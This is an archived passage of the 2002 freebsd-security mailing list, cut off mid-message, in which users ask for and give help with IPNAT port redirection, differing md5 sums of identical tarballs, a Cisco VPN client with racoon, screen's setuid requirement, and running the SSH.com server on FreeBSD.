From owner-freebsd-security Wed Sep 25 0:43:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9746F37B401; Wed, 25 Sep 2002 00:43:17 -0700 (PDT) Received: from 602pro.software602.sk (602pro.software602.sk [194.1.191.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 7A7D243E65; Wed, 25 Sep 2002 00:43:15 -0700 (PDT) (envelope-from juro@software602.sk) Received: from 194.1.191.22 ([194.1.191.22]) by 602pro.software602.sk (602Pro MESSAGING SERVER v. 4.0) id 2b3f7d5f; Wed, 25 Sep 2002 9:44:04 +0200 From: "Juraj Petrik" To: Cc: Subject: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease Date: Wed, 25 Sep 2002 09:41:44 +0200 Message-ID: <002201c26467$1fdf9270$7a01a8c0@pcjuro> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: 7bit X-Priority: 1 (Highest) X-MSMail-Priority: High X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: High X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Disposition-Notification-To: "Juraj Petrik" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hello, can you help me, please, I'm trying to run firewall with using IPFilter, IPNAT and Dummynet, on FreeBSD I'm readed so much HOWTOs but, I can't do redirection to another server in internal network: rl0 - WAN (194.x.x.0/24) 194.x.x.22 if FreeBSD box rl1 - LAN (192.168.1.0/24) 192.168.1.22 if FreeBSD box rl2 - DMZ (10.0.0.0/24) 10.0.0.22 if FreeBSD box my server is now on LAN, not on DMZ. I'm using FreeBSD 4.7 prerelease from CVS. In kernel config have added: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=30 options IPFIREWALL_FORWARD options IPFIREWALL_DEFAULT_TO_ACCEPT options IPDIVERT options DUMMYNET options IPFILTER options IPFILTER_LOG options IPFILTER_DEFAULT_BLOCK options RANDOM_IP_ID in /etc/rc.conf have: tcp_extensions="YES" gateway_enable="YES" portmap_enable="NO" #firewall_enable="YES" #firewall_type="/etc/dummynet.conf" #firewall_logging="NO" ipfilter_enable="YES" ipfilter_flags="" ipfilter_rules="/etc/ipf.conf" ipnat_enable="YES" ipnat_flags="" ipnat_rules="/etc/ipnat.conf" ipmon_enable="YES" ipmon_flags="-Dns -l block" in /etc/ipf.conf: pass in log all pass out log all in /etc/ipnat.conf: map rl0 192.168.1.0/24 -> 194.x.x.22/32 map rl0 0/0 -> 194.x.x.22/32 proxy port ftp ftp/tcp map rl0 192.168.1.0/24 -> 194.x.x.22/32 portmap tcp/udp 12500:60000 map rl0 192.168.1.0/24 -> 194.x.x.22/32 rdr rl0 194.x.x.22/32 port 80 -> 192.168.1.35 port 80 rdr rl0 194.x.x.22/32 port 22 -> 192.168.1.35 port 22 NAT from LAN to internet works OK, but from Internet I can't redirct connect to server on LAN (192.168.1.35) Please help me ANYBODY!!!! -jp- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 2:48:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3A1C437B401 for ; Wed, 25 Sep 2002 02:48:29 -0700 (PDT) Received: from phoenix.tricom.com.ph (phoenix.tricom.com.ph [203.167.87.58]) by mx1.FreeBSD.org (Postfix) with SMTP id 8856443E65 for ; Wed, 25 Sep 2002 02:48:28 -0700 (PDT) (envelope-from jimmy@tricom.com.ph) Received: (qmail 84152 invoked from network); 25 Sep 2002 09:48:25 -0000 Received: from unknown (HELO orion.tricom.com.ph) (203.167.87.59) by phoenix.tricom.com.ph with SMTP; 25 Sep 2002 09:48:25 -0000 Date: Wed, 25 Sep 2002 17:48:32 +0800 From: Jimmy To: freebsd-security@freebsd.org Subject: tar and md5 question Message-Id: <20020925174832.3985834a.jimmy@tricom.com.ph> Organization: Tricom X-Mailer: Sylpheed version 0.8.2 (GTK+ 1.2.10; i386-portbld-freebsd4.6.2) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I'm playing with my tar and md5 command, I noticed that the md5sum of my two (2) tar ball with the same content are not equal. Any ideas why it is not equal? Jimmy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 2:53:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57EE737B401 for ; Wed, 25 Sep 2002 02:53:27 -0700 (PDT) Received: from mx6.mail.ru (mx6.mail.ru [194.67.57.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4E67A43E4A for ; Wed, 25 Sep 2002 02:53:26 -0700 (PDT) (envelope-from _pppp@mail.ru) Received: from drweb by mx6.mail.ru with drweb-scanned (Exim MX.6) id 17u8rE-0001Aa-00; Wed, 25 Sep 2002 13:53:24 +0400 Received: from [213.128.193.142] (helo=mail.ru) by mx6.mail.ru with esmtp (Exim SMTP.6) id 17u8rE-00018K-00; Wed, 25 Sep 2002 13:53:24 +0400 Message-ID: <3D918790.1020502@mail.ru> Date: Wed, 25 Sep 2002 13:53:20 +0400 From: dima <_pppp@mail.ru> User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020816 X-Accept-Language: ru, en-us, en MIME-Version: 1.0 To: Jimmy Cc: freebsd-security@freebsd.org Subject: Re: tar and md5 question References: <20020925174832.3985834a.jimmy@tricom.com.ph> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Envelope-To: jimmy@tricom.com.ph, freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I'm playing with my tar and md5 command, I noticed that the md5sum of my > two (2) tar ball with the same content are not equal. Any ideas why it > is not equal? file times? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 3:38: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A52FC37B401 for ; Wed, 25 Sep 2002 03:38:01 -0700 (PDT) Received: from mx3.mail.ru (mx3.mail.ru [194.67.57.13]) by mx1.FreeBSD.org (Postfix) with ESMTP id 917E443E75 for ; Wed, 25 Sep 2002 03:38:00 -0700 (PDT) (envelope-from _pppp@mail.ru) Received: from drweb by mx3.mail.ru with drweb-scanned (Exim MX.3) id 17u9YM-000PB7-00; Wed, 25 Sep 2002 14:37:58 +0400 Received: from [213.128.193.142] (helo=mail.ru) by mx3.mail.ru with esmtp (Exim SMTP.3) id 17u9YK-000P5S-00; Wed, 25 Sep 2002 14:37:56 +0400 Message-ID: <3D919201.5060102@mail.ru> Date: Wed, 25 Sep 2002 14:37:53 +0400 From: dima <_pppp@mail.ru> User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020816 X-Accept-Language: ru, en-us, en MIME-Version: 1.0 To: "Ramsey G. Brenner" Cc: Jimmy , freebsd-security@freebsd.org Subject: Re: tar and md5 question References: <20020925174832.3985834a.jimmy@tricom.com.ph> <3D918790.1020502@mail.ru> <200209250433.00182.rgbrenner@myrealbox.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Envelope-To: rgbrenner@myrealbox.com, jimmy@tricom.com.ph, freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>I'm playing with my tar and md5 command, I noticed that the md5sum of my >>>two (2) tar ball with the same content are not equal. Any ideas why it >>>is not equal? >>file times? > It cant be file times, since the md5 utility does not look at that > information. The md5 utility only looks at the data in the file when it is > trying to determine the md5 sum. i meant tar saves file names in the archive To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 5: 3:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 958D237B401 for ; Wed, 25 Sep 2002 05:03:45 -0700 (PDT) Received: from smtp02.wxs.nl (smtp02.wxs.nl [195.121.6.54]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8589343E75 for ; Wed, 25 Sep 2002 05:03:44 -0700 (PDT) (envelope-from Peter.Blok@inter.NL.net) Received: from bsdpc ([80.60.248.65]) by smtp02.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id H2ZTCK01.MC7 for ; Wed, 25 Sep 2002 14:00:20 +0200 Content-Type: text/plain; charset="us-ascii" From: "Peter J. Blok" To: freebsd-security@freebsd.org Subject: cisco/altiga client Date: Wed, 25 Sep 2002 13:57:35 +0200 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200209251357.35279.Peter.Blok@inter.NL.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I have Cisco VPN 3000 (Altiga) software client on my laptop. With this client I establish a connection with a 3000 series concentrator. I would like to use the same software client to establish a transport connection with a FreeBSD host running racoon. Can somebody help me with this? Could this work? Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 10:28:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 66D1C37B401 for ; Wed, 25 Sep 2002 10:28:33 -0700 (PDT) Received: from hotmail.com (f25.pav0.hotmail.com [64.4.32.209]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0FF1F43E42 for ; Wed, 25 Sep 2002 10:28:33 -0700 (PDT) (envelope-from cdgaming@msn.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 25 Sep 2002 10:28:32 -0700 Received: from 24.217.73.45 by pv0fd.pav0.hotmail.msn.com with HTTP; Wed, 25 Sep 2002 17:28:32 GMT X-Originating-IP: [24.217.73.45] From: "Chest Rockwell" To: freebsd-security@freebsd.org Subject: screen question/problem. Date: Wed, 25 Sep 2002 12:28:32 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 25 Sep 2002 17:28:32.0890 (UTC) FILETIME=[F8B0EDA0:01C264B8] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i've used screen before. i installed a game server on my freebsd 4.5 box and when i try to run screen, i get this error. i am running it as the user that installed the server. can anyone help me with this? screen -A -m -d -S ./ucc-bin server BR-Anubis?XGame.xBombingRun Must run suid root for multiuser support. _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 11:28: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 66EF937B401 for ; Wed, 25 Sep 2002 11:27:58 -0700 (PDT) Received: from gunjin.wccnet.org (gunjin.wccnet.org [198.111.176.99]) by mx1.FreeBSD.org (Postfix) with ESMTP id D062043E7B for ; Wed, 25 Sep 2002 11:27:57 -0700 (PDT) (envelope-from anthony@gunjin.wccnet.org) Received: from gunjin.wccnet.org (localhost.rexroof.com [127.0.0.1]) by gunjin.wccnet.org (8.12.3/8.12.2) with ESMTP id g8PIZ9TU001867 for ; Wed, 25 Sep 2002 14:35:09 -0400 (EDT) Received: (from anthony@localhost) by gunjin.wccnet.org (8.12.3/8.12.3/Submit) id g8PIZ8bm001866 for freebsd-security@freebsd.org; Wed, 25 Sep 2002 14:35:08 -0400 (EDT) Date: Wed, 25 Sep 2002 14:35:08 -0400 From: Anthony Schneider To: freebsd-security@freebsd.org Subject: Re: screen question/problem. Message-ID: <20020925183508.GA1830@x-anthony.com> References: <20020925181034.GA1570@x-anthony.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020925181034.GA1570@x-anthony.com> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What are the permissions on the screen binary? I'm guessing that it isn't suid root, and that it wants to be. -Anthony. On Wed, Sep 25, 2002 at 12:28:32PM -0500, Chest Rockwell wrote: > i've used screen before. i installed a game server on my freebsd 4.5 box > and when i try to run screen, i get this error. i am running it as the > user that installed the server. can anyone help me with this? > > > screen -A -m -d -S ./ucc-bin server BR-Anubis?XGame.xBombingRun > > Must run suid root for multiuser support. > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 11:37:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7C43A37B404 for ; Wed, 25 Sep 2002 11:37:15 -0700 (PDT) Received: from mail.securesoftware.com (w168.z205158144.scl-ca.dsl.cnc.net [205.158.144.168]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8654A43E77 for ; Wed, 25 Sep 2002 11:37:14 -0700 (PDT) (envelope-from bob@securesoftware.com) Received: from wless213.securesoftware.com (unknown [10.10.20.213]) by mail.securesoftware.com (Postfix) with ESMTP id 9E7101345D3; Wed, 25 Sep 2002 14:38:56 -0400 (EDT) Subject: Re: screen question/problem. From: Bob Fleck To: Anthony Schneider Cc: freebsd-security@freebsd.org In-Reply-To: <20020925183508.GA1830@x-anthony.com> References: <20020925181034.GA1570@x-anthony.com> <20020925183508.GA1830@x-anthony.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 25 Sep 2002 14:34:33 -0400 Message-Id: <1032978873.399.6.camel@mcp.securesoftware.com> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You should _not_ make screen setuid root. Anyone who uses screen could then act as root, which would be bad. Make the server program setuid root instead. On Wed, 2002-09-25 at 14:35, Anthony Schneider wrote: > What are the permissions on the screen binary? > I'm guessing that it isn't suid root, and that it wants to be. > -Anthony. > > On Wed, Sep 25, 2002 at 12:28:32PM -0500, Chest Rockwell wrote: > > i've used screen before. i installed a game server on my freebsd 4.5 box > > and when i try to run screen, i get this error. i am running it as the > > user that installed the server. can anyone help me with this? > > > > > > screen -A -m -d -S ./ucc-bin server BR-Anubis?XGame.xBombingRun > > > > Must run suid root for multiuser support. > > > > > > _________________________________________________________________ > > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 12:13:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5060F37B401 for ; Wed, 25 Sep 2002 12:13:24 -0700 (PDT) Received: from mail.securesoftware.com (w168.z205158144.scl-ca.dsl.cnc.net [205.158.144.168]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94C1943E75 for ; Wed, 25 Sep 2002 12:13:23 -0700 (PDT) (envelope-from bob@securesoftware.com) Received: from wless213.securesoftware.com (unknown [10.10.20.213]) by mail.securesoftware.com (Postfix) with ESMTP id 9309C13459D; Wed, 25 Sep 2002 15:15:04 -0400 (EDT) Subject: Re: screen question/problem. From: Bob Fleck To: Matt Piechota Cc: Anthony Schneider , freebsd-security@FreeBSD.ORG In-Reply-To: <20020925144631.E90374-100000@cithaeron.argolis.org> References: <20020925144631.E90374-100000@cithaeron.argolis.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 25 Sep 2002 15:10:40 -0400 Message-Id: <1032981041.399.8.camel@mcp.securesoftware.com> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 2002-09-25 at 14:53, Matt Piechota wrote: > On 25 Sep 2002, Bob Fleck wrote: > > > You should _not_ make screen setuid root. Anyone who uses screen > > could then act as root, which would be bad. > > Make the server program setuid root instead. > > Screen likes to be root so it can do things like update utmp (or wtmp, > whichever). Unless you find a bug, it won't let normal people becomre > root, as it knows enough drop into the calling user's permissions before > running a shell. Bah, you're right, wasn't thinking before I sent that. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 12:26:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B761237B401 for ; Wed, 25 Sep 2002 12:26:33 -0700 (PDT) Received: from cithaeron.argolis.org (pool-138-88-46-230.res.east.verizon.net [138.88.46.230]) by mx1.FreeBSD.org (Postfix) with ESMTP id A3A1143E75 for ; Wed, 25 Sep 2002 12:26:25 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.6/8.12.5) with ESMTP id g8PIrmEl091133; Wed, 25 Sep 2002 14:53:48 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.6/8.12.6/Submit) with ESMTP id g8PIrmaI091130; Wed, 25 Sep 2002 14:53:48 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Wed, 25 Sep 2002 14:53:48 -0400 (EDT) From: Matt Piechota To: Bob Fleck Cc: Anthony Schneider , Subject: Re: screen question/problem. In-Reply-To: <1032978873.399.6.camel@mcp.securesoftware.com> Message-ID: <20020925144631.E90374-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 25 Sep 2002, Bob Fleck wrote: > You should _not_ make screen setuid root. Anyone who uses screen > could then act as root, which would be bad. > Make the server program setuid root instead. Screen likes to be root so it can do things like update utmp (or wtmp, whichever). Unless you find a bug, it won't let normal people becomre root, as it knows enough drop into the calling user's permissions before running a shell. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 12:40:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D48CE37B401 for ; Wed, 25 Sep 2002 12:40:29 -0700 (PDT) Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 753FF43E65 for ; Wed, 25 Sep 2002 12:40:29 -0700 (PDT) (envelope-from jason@shalott.net) Received: (qmail 24877 invoked by uid 1000); 25 Sep 2002 19:40:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Sep 2002 19:40:23 -0000 Date: Wed, 25 Sep 2002 12:40:23 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: screen question/problem. In-Reply-To: <20020925144631.E90374-100000@cithaeron.argolis.org> Message-ID: <20020925123015.Y11323-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Screen likes to be root so it can do things like update utmp (or wtmp, > whichever). I've been wondering about this for a while - on my personal systems, I've always created a group wtmp and made utmp/wtmp/lastlog group wtmp, group writable, and screen, xterm, etc, setgid wtmp instead of setuid root. This seems to me to preserve that portion of the functionality (I know that screen also likes to be setuid root for other reasons) while being substantially safer than having everything just be setuid root. Am I missing something? Are there other implications to using a wtmp group and setgid binaries? I think that this would be a nice change to make to the base system if it's reasonable to do so. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9khEnswXMWWtptckRAjjjAJ9hkCgYyKKH+qeZRHKNdloQ1SLkVQCgry8u fA9+H2QI1m17qLq3vJaSnRo= =2mTl -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 13:39:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E617D37B401 for ; Wed, 25 Sep 2002 13:39:51 -0700 (PDT) Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by mx1.FreeBSD.org (Postfix) with SMTP id 764E443E65 for ; Wed, 25 Sep 2002 13:39:51 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020925203950.81300.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Wed, 25 Sep 2002 13:39:50 PDT Date: Wed, 25 Sep 2002 13:39:50 -0700 (PDT) From: twig les Subject: Re: SSH.com on FreeBSD To: freebsd-security@FreeBSD.ORG In-Reply-To: <20020925202404.GA3009@hades.hell.gr> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm switching this discussion to security because I think it's a better fit. My bad for not doing it to begin with. ====================================================== Does this mean that the ssh.com server is installed? I need the proprietary daemon to compile and run instead of OpenSSH. Someone has to have done this already. --- Giorgos Keramidas wrote: > On 2002-09-25 11:09, twig les > wrote: > > Has anyone compiled and run SSH.com's ssh server > on > > FreeBSD? Specifically the boxes are running 4.6 > > release (fully patched of course :) and we will be > > using secureID. The base install is user (locked > down > > from there). > > You can always use the ports :-) > > : keramida@hades[23:23]/home/keramida$ ls -ld > /usr/ports/security/ssh* > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > /usr/ports/security/ssh > : drwxr-xr-x 3 root wheel 512 Sep 24 04:06 > /usr/ports/security/ssh-gui > : drwxr-xr-x 3 root wheel 512 Sep 13 22:16 > /usr/ports/security/ssh-multiadd > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > /usr/ports/security/ssh2 > > -- > Famous last words: "What duck?" -- (Terry Pratchett, > Soul Music) ===== ----------------------------------------------------------- Heavy metal made me do it. ----------------------------------------------------------- __________________________________________________ Do you Yahoo!? New DSL Internet Access from SBC & Yahoo! http://sbc.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 13:44:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C647E37B401; Wed, 25 Sep 2002 13:44:26 -0700 (PDT) Received: from isilon.com (isilon.com [65.101.129.58]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5895243E65; Wed, 25 Sep 2002 13:44:26 -0700 (PDT) (envelope-from billy@isilon.com) Received: from mouse.isilon.com (mouse.isilon.com [172.16.5.50]) by isilon.com (8.12.2/8.11.1) with ESMTP id g8PKiOUc023950; Wed, 25 Sep 2002 13:44:25 -0700 (PDT) (envelope-from billy@isilon.com) Date: Wed, 25 Sep 2002 13:43:23 -0700 (PDT) From: billy To: Juraj Petrik Cc: freebsd-security@FreeBSD.ORG, Subject: Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease In-Reply-To: <002201c26467$1fdf9270$7a01a8c0@pcjuro> Message-ID: <20020925134258.P75126-100000@mouse.isilon.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 25 Sep 2002, Juraj Petrik wrote: > hello, > can you help me, please, > > I'm trying to run firewall with using > IPFilter, IPNAT and Dummynet, on FreeBSD > > I'm readed so much HOWTOs but, I can't do > redirection to another server in internal > network: > rl0 - WAN (194.x.x.0/24) 194.x.x.22 if FreeBSD box > rl1 - LAN (192.168.1.0/24) 192.168.1.22 if FreeBSD box > rl2 - DMZ (10.0.0.0/24) 10.0.0.22 if FreeBSD box > > my server is now on LAN, not on DMZ. > > I'm using FreeBSD 4.7 prerelease from CVS. > > In kernel config have added: > options IPFIREWALL > options IPFIREWALL_VERBOSE > options IPFIREWALL_VERBOSE_LIMIT=30 > options IPFIREWALL_FORWARD > options IPFIREWALL_DEFAULT_TO_ACCEPT > options IPDIVERT > options DUMMYNET > > options IPFILTER > options IPFILTER_LOG > options IPFILTER_DEFAULT_BLOCK > options RANDOM_IP_ID > > in /etc/rc.conf have: > tcp_extensions="YES" > gateway_enable="YES" > portmap_enable="NO" > > #firewall_enable="YES" > #firewall_type="/etc/dummynet.conf" > #firewall_logging="NO" > > ipfilter_enable="YES" > ipfilter_flags="" > ipfilter_rules="/etc/ipf.conf" > > ipnat_enable="YES" > ipnat_flags="" > ipnat_rules="/etc/ipnat.conf" > > ipmon_enable="YES" > ipmon_flags="-Dns -l block" > > in /etc/ipf.conf: > pass in log all > pass out log all > > in /etc/ipnat.conf: > map rl0 192.168.1.0/24 -> 194.x.x.22/32 > map rl0 0/0 -> 194.x.x.22/32 proxy port ftp ftp/tcp > > map rl0 192.168.1.0/24 -> 194.x.x.22/32 portmap tcp/udp 12500:60000 > map rl0 192.168.1.0/24 -> 194.x.x.22/32 > > rdr rl0 194.x.x.22/32 port 80 -> 192.168.1.35 port 80 > rdr rl0 194.x.x.22/32 port 22 -> 192.168.1.35 port 22 > > NAT from LAN to internet works OK, > but from Internet I can't redirct connect to server > on LAN (192.168.1.35) > > Please help me ANYBODY!!!! > -jp- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 13:48: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B8FE837B401 for ; Wed, 25 Sep 2002 13:47:56 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id 12FD143E42 for ; Wed, 25 Sep 2002 13:47:56 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 17738 invoked by uid 1001); 25 Sep 2002 20:47:50 -0000 Date: Wed, 25 Sep 2002 16:47:50 -0400 From: "Peter C. Lai" To: twig les Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH.com on FreeBSD Message-ID: <20020925204750.GB17502@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020925202404.GA3009@hades.hell.gr> 